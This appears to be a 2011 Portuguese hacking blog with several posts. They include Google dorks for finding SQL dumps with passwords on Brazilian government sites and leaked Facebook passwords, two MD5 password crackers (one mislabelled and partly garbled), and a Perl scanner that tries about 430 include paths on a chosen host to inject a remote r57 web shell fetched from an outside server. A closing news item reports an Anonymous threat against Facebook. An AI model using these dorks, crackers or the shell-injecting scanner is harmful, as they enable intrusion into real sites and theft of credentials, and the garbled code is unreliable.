Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

terça-feira, 23 de agosto de 2011

segunda-feira, 22 de agosto de 2011

Pesquisar parâmetro sql dentro de bancos .gov.br

Pesquisar parâmetro sql dentro de bancos .gov.br

Vamos pesquisa, com uma simples String de busca temos um resultado interessante.

Buscando extençoes .sql em sites de domínio .gov +INSERT INTO = inseriri dados em base sql.

buscando esses parâmetros temos até acesso a senhas e outros dados.


Dork: -repositorio -svn -softwarepublico site:.gov.br INSERT INTO  ext:sql

domingo, 14 de agosto de 2011

Scan Senha de Facebook pelo google.

Scan Senha de Facebook pelo google.


1º Abra o google.
2º Digite isso na barra de pesquisa:   intext:"Date Submitted" intext:"password"
3º Seja feliz.

[Perl] MD5 Brute forcer

 [Perl] MD5 Brute forcer
#MD5 Cracker (GUI Version)
#d3hydr8[at]gmail[dot]com
#http://www.darkc0de.com

from Tkinter import *
import tkFileDialog, md5

class Application(Frame):
    def __init__(self, master):
        Frame.__init__(self, master)
        self.grid()
        self.create_widget()
    def create_widget(self):
       
        self.lbl = Label(self, text = "ENTER MD5: ")
        self.lbl.grid(row = 2, column = 0, sticky = E)
       
        self.pw_ent = Entry(self, width = 32)
        self.pw_ent.grid(row = 2, column = 1, sticky = E)
       
        self.submit_bttn = Button(self, text = "Choose Wordlist", command = self.loadwords)
        self.submit_bttn.grid(row = 5, column = 1, sticky = W)
       
        self.txtbox = Text(self, width = 55, height = 8, font=('Georgia', 8), bg = "#CCC", wrap = WORD)
        self.txtbox.grid(row = 7, column = 0, columnspan = 2, sticky = W)

        self.bttn1 = Button(self, text = "Crack", font=('courier', 10, 'bold'), command = self.crack)
        self.bttn1.grid(row = 9, columnspan = 2, sticky = "WE")
   
        self.clear = Button(self, text="Clear", font=('Georgia', 8), command = self.clear)
        self.clear.grid(row = 10, column = 1,sticky= E)
       
    def loadwords(self):
        global wordlist
        file = tkFileDialog.askopenfile(parent=root,mode='r',title='Choose a file')
        wordlist = file.readlines()
        self.txtbox.insert(END, "Loaded: "+str(len(wordlist))+" words")
       
    def crack(self):
        pw = self.pw_ent.get()
        if len(pw) == 32:
            self.txtbox.insert(END, "\nCracking: "+pw)
            for word in wordlist:
                hash = md5.new(word.replace("\n","")).hexdigest()
                if pw == hash:
                    self.txtbox.insert(END, "\n\nCracked: "+word)
                    break
            self.txtbox.insert(END, "\nComplete")
        else:
            self.txtbox.insert(END, "\nImproper MD5 Length: "+str(len(pw)))
           
    def clear(self):
        self.pw_ent.delete(0, END)
           self.txtbox.delete(0.0, END)
        wordlist = []
       
root = Tk()
root.title("MD5 Cracker")
root.geometry("350x200")
app = Application(root)
root.mainloop()

[Perl] MD5 Brute forcer

 [Perl] MD5 Brute forcer
 #!/usr/bin/perl

# use strict; Sorry next time i'll use it ;)
# MD5 Hash Bruteforce Kit
# by Iman Karim ([email protected])
# URL : http://home.inf.fh-rhein-sieg.de/~ikarim2s/
# Date : 11.02.2007
# Info[0] : This Cracker is by far not the fastest! But it helped me alot to find "lost" passwords ;)
# Info[1] : Written under Kubuntu Linux (Throw away Windows!)
# Info[2] : If you can code a bit perl, you can modify it to crack sha etc too...
# Greets to: Invisible!

$ver = "01";

$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.



if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";};
use Digest::MD5 qw(md5_hex);
use Time::HiRes qw(gettimeofday);

if ($ARGV[0]=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($ARGV[0]=~"A") {
$alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($ARGV[0]=~"d") {
$alpha = $alpha."1234567890";}

if ($ARGV[0]=~"x") {

$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}

if ($alpha eq "" or $ARGV[3] eq "") {usage();};
if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";};

print "Selected charset for attack: '$alpha\'\n";
print "Going to Crack '$ARGV[3]'...\n";

for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){
crack ($t);
}

sub usage{
print "\n\nMD5 Hash Bruteforce Kit v_$ver\n";
print "by Iman Karim (iman.karim\@smail.inf.fh-bonn-rhein-sieg.de)\n";
print "http:\/\/home.inf.fh-rhein-sieg.de\/~ikarim2s\/\n\n";
print "USAGE\n";

print "./md5crack \n";
print " Charset can be: [aAdx]\n";
print " a = {'a','b','c',...}\n";
print " A = {'A','B','C',...}\n";
print " d = {'1','2','3',...}\n";
print " x = {'!','\"',' ',...}\n";
print "EXAMPLE FOR CRACKING A MD5 HASH\n";
print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n";
print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n";
print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n";
print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n";
print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with nearly every character.\n";
print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n";
die "Quitting...\n";

}

sub crack{
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;}

$Start = gettimeofday();
do{
  for (my $i =0;$i<$CharSet;$i++){
   if ($RawString[$i] > length($alpha)-1){
    if ($i==$CharSet-1){
    print "Bruteforcing done with $CharSet Chars. No Results.\n";
    $cnt=0;
    return false;
   }
   $RawString[$i+1]++;
   $RawString[$i]=0;
   }
  }

###################################################

   $ret = "";
   for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
   $hash = md5_hex($ret);
   $cnt++;
   $Stop = gettimeofday();
   if ($Stop-$Start>$dbgtmr){
    $cnt = int($cnt/$dbgtmr);
    print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
    $cnt=0;
    $Start = gettimeofday();
   }
            print "$ARGV[3] != $hash ($ret)\n";
   if ($ARGV[3] eq $hash){
    die "\n**** Password Cracked! => $ret\n";
   }

###################################################

  #checkhash($CharSet)."\n";

  $RawString[0]++;
}while($RawString[$CharSet-1]
$dbgtmr){="" (my="" .="" ;="" <="" checkhash{="" cracked!=">" eq="" for="" hashes\\second.\tlast="" if="" length($alpha));="" pass="" password="" sub="" substr($alpha,$rawstring[$i],1);}="" yourmd5="" }<="" }="">

Scritp [Perl] RFI Scanner.

Scanner [Perl] RFI Scanner

 

#!/usr/bin/perl
#Scan a host for rfi vulnerability
# by priv8, senk0 version
use HTTP::Request;
use LWP::UserAgent;

&inizio;
sub inizio{
print q(
  ###########################
   Rfi vulnerability scanner
   by nobody, senk0 version
  ###########################
);
print "\n Insert host:(ex: http://www.site.com/)\n";
$host=;
chomp($host);
print "Ok lets scan..\n";
$rfi1="includes/header.php?systempath=";
$rfi2="Gallery/displayCategory.php?basepath=";
$rfi3="index.inc.php?PATH_Includes=";
$rfi4="nphp/nphpd.php?nphp_config[LangFile]=";
$rfi5="include/db.php?GLOBALS[rootdp]=";
$rfi6="ashnews.php?pathtoashnews=";
$rfi7="ashheadlines.php?pathtoashnews=";
$rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi9="demo/includes/init.php?user_inc=";
$rfi10="jaf/index.php?show=";
$rfi11="inc/shows.inc.php?cutepath=";
$rfi12="poll/admin/common.inc.php?base_path=";
$rfi13="pollvote/pollvote.php?pollname=";
$rfi14="sources/post.php?fil_config=";
$rfi15="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi16="bb_lib/checkdb.inc.php?libpach=";
$rfi17="include/livre_include.php?no_connect=lol&chem_absolu=";
$rfi18="index.php?from_market=Y&pageurl=";
$rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi20="pivot/modules/module_db.php?pivot_path=";
$rfi21="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi22="derniers_commentaires.php?rep=";
$rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi26="coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$rfi30="myPHPCalendar/admin.php?cal_dir=";
$rfi31="agendax/addevent.inc.php?agendax_path=";
$rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi34="main.php?page=";
$rfi35="default.php?page=";
$rfi36="index.php?action=";
$rfi37="index1.php?p=";
$rfi38="index2.php?x=";
$rfi39="index2.php?content=";
$rfi40="index.php?conteudo=";
$rfi41="index.php?cat=";
$rfi42="include/new-visitor.inc.php?lvc_include_dir=";
$rfi43="modules/agendax/addevent.inc.php?agendax_path=";
$rfi44="shoutbox/expanded.php?conf=";
$rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi46="pivot/modules/module_db.php?pivot_path=";
$rfi47="library/editor/editor.php?root=";
$rfi48="library/lib.php?root=";
$rfi49="e107/e107_handlers/secure_img_render.php?p=";
$rfi50="zentrack/index.php?configFile=";
$rfi51="main.php?x=";
$rfi52="becommunity/community/index.php?pageurl=";
$rfi53="GradeMap/index.php?page=";
$rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi55="calendar/calendar.php?serverPath=";
$rfi56="calendar/functions/popup.php?serverPath=";
$rfi57="calendar/events/header.inc.php?serverPath=";
$rfi58="calendar/events/datePicker.php?serverPath=";
$rfi59="calendar/setup/setupSQL.php?serverPath=";
$rfi60="calendar/setup/header.inc.php?serverPath=";
$rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$rfi62="zentrack/index.php?configFile=";
$rfi63="pivot/modules/module_db.php?pivot_path=";
$rfi64="inc/header.php/step_one.php?server_inc=";
$rfi65="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi66="inc/pipe.php?HCL_path=";
$rfi67="include/write.php?dir=";
$rfi68="include/new-visitor.inc.php?lvc_include_dir=";
$rfi69="includes/header.php?systempath=";
$rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi71="coppercop/theme.php?THEME_DIR=";
$rfi72="zentrack/index.php?configFile=";
$rfi73="pivot/modules/module_db.php?pivot_path=";
$rfi74="inc/header.php/step_one.php?server_inc=";
$rfi75="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi76="inc/pipe.php?HCL_path=";
$rfi77="include/write.php?dir=";
$rfi78="include/new-visitor.inc.php?lvc_include_dir=";
$rfi79="includes/header.php?systempath=";
$rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi81="coppercop/theme.php?THEME_DIR=";
$rfi82="becommunity/community/index.php?pageurl=";
$rfi83="shoutbox/expanded.php?conf=";
$rfi84="agendax/addevent.inc.php?agendax_path=";
$rfi85="myPHPCalendar/admin.php?cal_dir=";
$rfi86="yabbse/Sources/Packages.php?sourcedir=";
$rfi87="dotproject/modules/projects/addedit.php?root_dir=";
$rfi88="dotproject/modules/projects/view.php?root_dir=";
$rfi89="dotproject/modules/projects/vw_files.php?root_dir=";
$rfi90="dotproject/modules/tasks/addedit.php?root_dir=";
$rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$rfi92="My_eGallery/public/displayCategory.php?basepath=";
$rfi93="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi94="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi96="modules/agendax/addevent.inc.php?agendax_path=";
$rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi101="shoutbox/expanded.php?conf=";
$rfi102="pivot/modules/module_db.php?pivot_path=";
$rfi103="library/editor/editor.php?root=";
$rfi104="library/lib.php?root=";
$rfi105="e107/e107_handlers/secure_img_render.php?p=";
$rfi106="main.php?x=";
$rfi107="main.php?page=";
$rfi108="index.php?meio.php=";
$rfi109="index.php?include=";
$rfi110="index.php?inc=";
$rfi111="index.php?page=";
$rfi112="index.php?pag=";
$rfi113="index.php?p=";
$rfi114="index.php?x=";
$rfi115="index.php?open=";
$rfi116="index.php?visualizar=";
$rfi117="index.php?pagina=";
$rfi118="index2.php?content=";
$rfi119="inc/step_one_tables.php?server_inc=";
$rfi120="GradeMap/index.php?page=";
$rfi121="phpshop/index.php?base_dir=";
$rfi122="admin.php?cal_dir=";
$rfi123="contacts.php?cal_dir=";
$rfi124="convert-date.php?cal_dir=";
$rfi125="album_portal.php?phpbb_root_path=";
$rfi126="mainfile.php?MAIN_PATH=";
$rfi127="dotproject/modules/files/index_table.php?root_dir=";
$rfi128="html/affich.php?base=";
$rfi129="gallery/init.php?HTTP_POST_VARS=";
$rfi130="pm/lib.inc.php?pm_path=";
$rfi131="ideabox/include.php?gorumDir=";
$rfi132="index2.php?includes_dir=";
$rfi133="forums/toplist.php?phpbb_root_path=";
$rfi134="forum/toplist.php?phpbb_root_path=";
$rfi135="admin/config_settings.tpl.php?include_path=";
$rfi136="include/common.php?include_path=";
$rfi137="event/index.php?page=";
$rfi138="forum/index.php?includeFooter=";
$rfi139="forums/index.php?includeFooter=";
$rfi140="forum/bb_admin.php?includeFooter=";
$rfi141="forums/bb_admin.php?includeFooter=";
$rfi142="language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi144="blend_data/blend_common.php?phpbb_root_path=";
$rfi145="master.php?root_path=";
$rfi146="includes/kb_constants.php?module_root_path=";
$rfi147="forum/includes/kb_constants.php?module_root_path=";
$rfi148="forums/includes/kb_constants.php?module_root_path=";
$rfi149="classes/adodbt/sql.php?classes_dir=";
$rfi150="agenda.php3?rootagenda=";
$rfi151="agenda2.php3?rootagenda=";
$rfi152="sources/lostpw.php?CONFIG[path]=";
$rfi153="topsites/sources/lostpw.php?CONFIG[path]=";
$rfi154="toplist/sources/lostpw.php?CONFIG[path]=";
$rfi155="sources/join.php?CONFIG[path]=";
$rfi156="topsites/sources/join.php?CONFIG[path]=";
$rfi157="toplist/sources/join.php?CONFIG[path]=";
$rfi158="topsite/sources/join.php?CONFIG[path]=";
$rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$rfi160="extras/poll/poll.php?file_newsportal=";
$rfi161="index.php?site_path=";
$rfi162="mail/index.php?site_path=";
$rfi163="fclick/show.php?path=";
$rfi164="show.php?path=";
$rfi165="calogic/reconfig.php?GLOBALS[CLPath]=";
$rfi166="eshow.php?Config_rootdir=";
$rfi167="auction/auction_common.php?phpbb_root_path=";
$rfi168="index.php?inc_dir=";
$rfi169="calendar/index.php?inc_dir=";
$rfi170="modules/TotalCalendar/index.php?inc_dir=";
$rfi171="modules/calendar/index.php?inc_dir=";
$rfi172="calendar/embed/day.php?path=";
$rfi173="ACalendar/embed/day.php?path=";
$rfi174="calendar/add_event.php?inc_dir=";
$rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$rfi176="claroline/auth/ldap/authldap.php?includePath=";
$rfi177="docebo/modules/credits/help.php?lang=";
$rfi178="modules/credits/help.php?lang=";
$rfi179="config.php?returnpath=";
$rfi180="editsite.php?returnpath=";
$rfi181="in.php?returnpath=";
$rfi182="addsite.php?returnpath=";
$rfi183="includes/pafiledb_constants.php?module_root_path=";
$rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$rfi186="auth/auth.php?phpbb_root_path=";
$rfi187="auth/auth_phpbb/phpbb_root_path=";
$rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$rfi191="phpdig/includes/config.php?relative_script_path=";
$rfi192="includes/phpdig/includes/config.php?relative_script_path=";
$rfi193="includes/dbal.php?eqdkp_root_path=";
$rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$rfi195="dkp/includes/dbal.php?eqdkp_root_path=";
$rfi196="include/SQuery/gameSpy2.php?libpath=";
$rfi197="include/global.php?GLOBALS[includeBit]=";
$rfi198="topsites/config.php?returnpath=";
$rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$rfi201="forum/addpost_newpoll.php?thispath=";
$rfi202="forums/addpost_newpoll.php?thispath=";
$rfi203="ubbthreads/ubbt.inc.php?thispath=";
$rfi204="forums/ubbt.inc.php?thispath=";
$rfi205="forum/ubbt.inc.php?thispath=";
$rfi206="forum/admin/addentry.php?phpbb_root_path=";
$rfi207="admin/addentry.php?phpbb_root_path=";
$rfi208="index.php?f=";
$rfi209="index.php?act=";
$rfi210="ipchat.php?root_path=";
$rfi211="includes/orderSuccess.inc.php?glob[rootDir]=";
$rfi212="stats.php?dir[func]=dir[base]=";
$rfi213="ladder/stats.php?dir[base]=";
$rfi214="ladders/stats.php?dir[base]=";
$rfi215="sphider/admin/configset.php?settings_dir=";
$rfi216="admin/configset.php?settings_dir=";
$rfi217="vwar/admin/admin.php?vwar_root=";
$rfi218="modules/vwar/admin/admin.php?vwar_root=";
$rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$rfi221="sphider/admin/configset.php?settings_dir=";
$rfi222="admin/configset.php?settings_dir=";
$rfi223="impex/ImpExData.php?systempath=";
$rfi224="forum/impex/ImpExData.php?systempath=";
$rfi225="forums/impex/ImpExData.php?systempath=";
$rfi226="application.php?base_path=";
$rfi227="index.php?theme_path=";
$rfi228="become_editor.php?theme_path=";
$rfi229="add.php?theme_path=";
$rfi230="bad_link.php?theme_path=";
$rfi231="browse.php?theme_path=";
$rfi232="detail.php?theme_path=";
$rfi233="fav.php?theme_path=";
$rfi234="get_rated.php?theme_path=";
$rfi235="login.php?theme_path=";
$rfi236="mailing_list.php?theme_path=";
$rfi237="new.php?theme_path=";
$rfi238="modify.php?theme_path=";
$rfi239="pick.php?theme_path=";
$rfi240="power_search.php?theme_path=";
$rfi241="rating.php?theme_path=";
$rfi242="register.php?theme_path=";
$rfi243="review.php?theme_path=";
$rfi244="rss.php?theme_path=";
$rfi245="search.php?theme_path=";
$rfi246="send_pwd.php?theme_path=";
$rfi247="sendmail.php?theme_path=";
$rfi248="tell_friend.php?theme_path=";
$rfi249="top_rated.php?theme_path=";
$rfi250="user_detail.php?theme_path=";
$rfi251="user_search.php?theme_path=";
$rfi252="invoice.php?base_path=";
$rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$rfi254="cgi-bin/install/index.php?G_PATH=";
$rfi255="cgi-bin/include/print_category.php?dir=";
$rfi256="includes/class_template.php?quezza_root_path=";
$rfi257="bazar/classified_right.php?language_dir=";
$rfi258="classified_right.php?language_dir=";
$rfi259="phpBazar/classified_right.php?language_dir=";
$rfi260="chat/messagesL.php3?cmd=";
$rfi261="phpMyChat/chat/messagesL.php3?cmd=";
$rfi262="bbs/include/write.php?dir=";
$rfi263="visitorupload.php?cmd=";
$rfi264="modules/center/admin/accounts/process.php?module_path]=";
$rfi265="index.php?template=";
$rfi266="armygame.php?libpath=";
$rfi267="lire.php?rub=";
$rfi268="pathofhostadmin/?page=";
$rfi269="apa_phpinclude.inc.php?apa_module_basedir=";
$rfi270="index.php?req_path=";
$rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$rfi272="Farsi1/index.php?archive=";
$rfi273="index.php?archive=";
$rfi274="show_archives.php?template=";
$rfi275="forum/include/common.php?pun_root=";
$rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$rfi277="vuln.php?=";
$rfi278="cgi-bin//include/write.php?dir=";
$rfi279="admin/common.inc.php?basepath=";
$rfi280="pm/lib.inc.php?sfx=";
$rfi281="pm/lib.inc.php?pm_path=";
$rfi282="artmedic-kleinanzeigen-path/index.php?id=";
$rfi283="osticket/include/main.php?include_dir=";
$rfi284="include/main.php?config[search_disp]=include_dir=";
$rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$rfi286="quick_reply.php?phpbb_root_path=";
$rfi287="zboard/include/write.php?dir=";
$rfi288="admin/plog-admin-functions.php?configbasedir=";
$rfi289="content.php?content=";
$rfi290="q-news.php?id=";
$rfi291="_conf/core/common-tpl-vars.php?confdir=";
$rfi292="votebox.php?VoteBoxPath=";
$rfi293="al_initialize.php?alpath=";
$rfi294="include/db.php?GLOBALS[rootdp]=";
$rfi295="modules/news/archivednews.php?GLOBALS[language_home]=";
$rfi296="protection.php?siteurl=";
$rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$rfi298="index2.php?includes_dir=";
$rfi299="classes.php?LOCAL_PATH=";
$rfi300="extensions/moblog/moblog_lib.php?basedir=";
$rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi302="phpWebLog/include/init.inc.php?G_PATH=";
$rfi303="admin/objects.inc.php4?Server=";
$rfi304="trg_news30/trgnews/install/article.php?dir=";
$rfi305="block.php?Include=";
$rfi306="arpuivo.php?data=";
$rfi307="setup/index.php?GALLERY_BASEDIR=";
$rfi308="include/help.php?base=";
$rfi309="index.php?[Home]=";
$rfi310="block.php?Include=";
$rfi311="examples/phonebook.php?page=";
$rfi312="PHPNews/auth.php?path=";
$rfi313="include/print_category.php?dir=";
$rfi314="skin/zero_vote/login.php?dir=";
$rfi315="skin/zero_vote/setup.php?dir=";
$rfi316="skin/zero_vote/ask_password.php?dir=";
$rfi317="gui/include/sql.php?include_path=";
$rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
$rfi319="email.php?login=cer_skin=";
$rfi320="PhotoGal/ops/gals.php?news_file=";
$rfi321="index.php?custom=";
$rfi322="loginout.php?cutepath=";
$rfi323="oneadmin/config.php?path[docroot]=";
$rfi324="xcomic/initialize.php?xcomicRootPath=";
$rfi325="skin/zero_vote/setup.php?dir=";
$rfi326="skin/zero_vote/error.php? dir=";
$rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi333="src/index_overview.inc.php?config[path_src_include]=";
$rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$rfi335="src/index_image.inc.php?config[path_src_include]=";
$rfi336="src/image-gd.class.php?config[path_src_include]=";
$rfi337="src/image.class.php?config[path_src_include]=";
$rfi338="src/album.class.php?config[path_src_include]=";
$rfi339="src/show_random.inc.php?config[path_src_include]=";
$rfi340="src/main.inc.php?config[path_src_include]=";
$rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi349="src/index_overview.inc.php?config[path_src_include]=";
$rfi350="src/image-gd.class.php?config[path_src_include]=";
$rfi351="src/image.class.php?config[image_module]=";
$rfi352="src/album.class.php?config[path_src_include]=";
$rfi353="src/show_random.inc.php?config[path_src_include]=";
$rfi353="src/main.inc.php?config[path_src_include]=";
$rfi354="includes/db_adodb.php?baseDir=";
$rfi355="includes/db_connect.php?baseDir=";
$rfi356="includes/session.php?baseDir=";
$rfi357="modules/projects/gantt.php?dPconfig[root_dir]=";
$rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$rfi360="modules/admin/vw_usr_roles.php?baseDir=";
$rfi361="modules/public/calendar.php?baseDir=";
$rfi362="modules/public/date_format.php?baseDir=";
$rfi363="modules/tasks/gantt.php?baseDir=";
$rfi364="mantis/login_page.php?g_meta_include_file=";
$rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$rfi366="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi367="dotproject/modules/files/index_table.php?root_dir=";
$rfi368="nukebrowser.php?filnavn=";
$rfi369="bug_sponsorship_list_view_inc.php?t_core_path=";
$rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi373="includes/calendar.php?phpc_root_path=";
$rfi374="includes/setup.php?phpc_root_path=";
$rfi375="phpBB/admin/admin_styles.php?mode=";
$rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$rfi377="admin/lang.php?CMS_ADMIN_PAGE=";
$rfi378="inc/pipe.php?HCL_path=";
$rfi379="include/write.php?dir=";
$rfi380="becommunity/community/index.php?pageurl=";
$rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi383="modules/agendax/addevent.inc.php?agendax_path=";
$rfi384="shoutbox/expanded.php?conf=";
$rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi386="index.php?page=";
$rfi387="index.php?pag=";
$rfi388="index.php?include=";
$rfi389="index.php?content=";
$rfi390="index.php?cont=";
$rfi391="index.php?c=";
$rfi392="modules/My_eGallery/index.php?basepath=";
$rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$rfi394="journal.php?m=";
$rfi395="index.php?m=";
$rfi396="links.php?c=";
$rfi397="forums.php?m=";
$rfi398="list.php?c=";
$rfi399="user.php?xoops_redirect=";
$rfi400="index.php?id=";
$rfi401="r.php?url=";
$rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$rfi403="inc/formmail.inc.php?script_root=";
$rfi404="include/init.inc.php?G_PATH=";
$rfi405="backend/addons/links/index.php?PATH=";
$rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi408="protection.php?siteurl=";
$rfi409="htmltonuke.php?filnavn=";
$rfi410="mail_autocheck.php?pm_path=";
$rfi411="index.php?p=";
$rfi412="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi413="e107/e107_handlers/secure_img_render.php?p=";
$rfi414="include/new-visitor.inc.php?lvc_include_dir=";
$rfi415="community/modules/agendax/addevent.inc.php?agendax_path=";
$rfi416="library/editor/editor.php?root=";
$rfi417="library/lib.php?root=";
$rfi418="zentrack/index.php?configFile=";
$rfi419="pivot/modules/module_db.php?pivot_path=";
$rfi420="myPHPCalendar/admin.php?cal_dir=";
$rfi421="index.php/main.php?x=";
$rfi422="os/pointer.php?url=";
$rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$rfi424="db.php?path_local=";
$rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$rfi426="index.php?kietu[url_hit]=";
$rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$rfi428="Sources/Packages.php?sourcedir=";
$rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";

$int = $values[ rand(4) ];
for($int=1;$int<430;$int++){
@cmdgif="http://usuarios.lycos.es/poizonbox/r57.txt?";
#Seu Script de Teste.
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnerable..\n";
}}
}
}

segunda-feira, 8 de agosto de 2011

Anonymous promete "matar" Facebook

Anonymous promete

Anonymous promete

Os Anonymous estão a preparar um ataque ao Facebook, considerando alguns vídeos publicados no YouTube, onde supostamente o grupo de hackers anuncia que irá liderar uma "ciberinvestida" mortal contra a rede social criada por Mark Zuckerberg, com data marcada para 5 de Novembro.

Na origem da decisão de avançar com a "Operação Facebook", que promete ser mais radical do que os ataques anteriores, onde a finalidade era reivindicar ou simplesmente "molestar", estão as constantes violações à privacidade dos utilizadores, justificam.

